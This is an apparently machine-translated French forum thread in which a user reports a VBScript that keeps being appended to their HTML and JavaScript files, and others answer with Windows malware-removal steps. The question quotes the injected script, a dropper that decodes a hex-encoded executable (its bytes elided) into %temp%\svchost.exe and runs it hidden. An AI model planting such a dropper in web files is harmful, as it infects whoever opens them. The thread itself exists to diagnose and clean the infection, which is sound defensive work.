Chaque fois que j'ouvre des fichiers JavaScript (.js) Ou HTML (.html) après quelques jours dans Notepad ++, un script VB similaire est automatiquement ajouté à la fin. Je suis convaincu qu'il s'agit d'une sorte de virus, quelqu'un peut-il me guider sur ce sujet?
</html> // My file ends here...... <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000 ...... {lots of numbers} Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT><!-- .... {Lots of junk characters here } -->
Le fichier qu'il exécute est% temp% \ svchost.exe.
Par conséquent, faites une liste de tâches
tasklist /svc /fi "imagename eq svchost.exe"
Prendre note de svots sans aucun service contenant. Mettez le PID actuel pour xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
Cela arrêtera cette partie particulière en cours d'exécution.
La technique utilisée par le virus ne fonctionnera pas de manière fiable surtout dans les fenêtres non anglaises.
Aussi, au lieu de le supprimer, modifiez la sécurité pour éviter l'exécution jusqu'à ce que vous nettoyiez d'autres éléments qui pourraient exister.
icacls "%temp%\svchost.exe" /deny Everyone:F
Ceci est pour Vista mais largement applicable à toutes les versions.
Nettoyage de virus
Si vous rencontrez des problèmes dans le mode normal. Essayez de le faire en mode sans échec avec le réseautage.
Cliquez sur Démarrer – Tous les programmes – Accessoires – Exécuter et taper
msconfig
Ensuite, accédez à l'onglet Boot et cliquez sur Safe Boot et cochez également Network. Redémarrez. Revenez ici et décochez Safe Boot pour revenir au mode normal.
Scanner de sécurité
Le Microsoft Safety Scanner est un outil de sécurité téléchargeable gratuit qui fournit une analyse à la demande et aide à éliminer les virus, les logiciels espions et autres logiciels malveillants. Cela fonctionne avec votre logiciel antivirus existant.
http://www.microsoft.com/security/scanner/en-au/default.aspx
Outil de suppression de logiciel malveillant
Si vous ne pouvez pas télécharger ou exécuter le Scanner de sécurité, Windows a un petit programme antivirus intégré. Il cible uniquement les menaces les plus courantes. Il voudra mettre à jour, ne le laissez pas. Exécutez-le sans mise à jour. Ensuite, exécutez-le à nouveau en le mettant à jour cette fois.
Cliquez sur Démarrer – Tous les programmes – Accessoires – Exécuter (ou appuyez sur Winkey + R). Type
mrt
Restaurer le pare-feu
Vous pouvez réinitialiser votre pare-feu aux paramètres par défaut.
Démarrer – Tous les programmes – Accessoires – Cliquez avec le bouton droit sur Invite de commandes et choisissez Exécuter en tant qu'administrateur. Tapez (ou copiez et collez en cliquant avec le bouton droit de la souris dans la fenêtre Invite de commandes et en choisissant Coller).
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
Fixtures de sécurité
Fixits sont des programmes de dépannage de Microsoft. Il y en a 27.
Correction automatique des paramètres de sécurité Windows pour garder votre PC en sécurité
http://support.microsoft.com/mats/Malware_Prevention/en-us
et
Réparez les problèmes de sécurité pour protéger et sécuriser Windows automatiquement
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
et
Réparez les problèmes d'Internet Explorer pour rendre l'IE rapide, sécuritaire et stable
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
Pour la visite de la liste complète
http://support.microsoft.com/fixit/en-us
Lorsque vous choisissez de le télécharger, choisissez l'option à exécuter sur un autre ordinateur. Ensuite, vous pouvez l'enregistrer sur votre disque dur dans un dossier. Ouvrez le dossier, ouvrez le dossier Fix it Portable et exécutez Lancer Fix It. Il contiendra les 27 Fixits.
Antivirus à plein temps
Pour un antivirus permanent, nous constatons ici un manque complet de problèmes pour les personnes qui utilisent Microsoft Security Essentials.
http://www.microsoft.com/en-au/download/details.aspx?id=5201
Si tout le reste échoue
Ce programme de Microsoft lance un autre système d'exploitation de base pour nettoyer Windows. Vous devez le mettre sur un USB ou un DVD, puis démarrer à partir de celui-ci.
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
Regarde le détail sur la menace
Microsoft maintient une encyclopédie d'informations sur les virus.
http://www.microsoft.com/security/portal/threat/threats.aspx
Je pense également que votre système a affecté certains virus. Je veux partager un lien que j'ai rencontré qui correspond à votre question s'il vous plaît passer à travers, ici je vais publier le lien -> http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted -automatically-in-HTML-page
Je pense que c'est un virus.
Donc, vous devez installer un logiciel antivirus si vous n'en avez pas.
Je recommande gratuitement: Microsoft Security Essentials ou Avast .
De plus, vous pouvez télécharger une utilité Antivirus spéciale juste pour numériser et ne pas l'installer – Dr Web CureIt!
Ensuite, effectuez une analyse complète de votre ordinateur.
Vous devez vérifier toutes les commandes de démarrage et supprimer tous les messages malveillants. Par exemple, CCleaner Free pourrait vous aider à les vérifier.
UPD Après avoir nettoyé et supprimé les commandes de démarrage, vous pouvez utiliser l'utilitaire sfc
.
Microsoft Windows Resource Checker
Analyse l'intégrité de tous les fichiers système protégés et remplace les versions incorrectes avec les versions Microsoft correctives.
Exécutez cmd
avec les privilèges d'administration, puis exécutez la commande sfc /scannow
.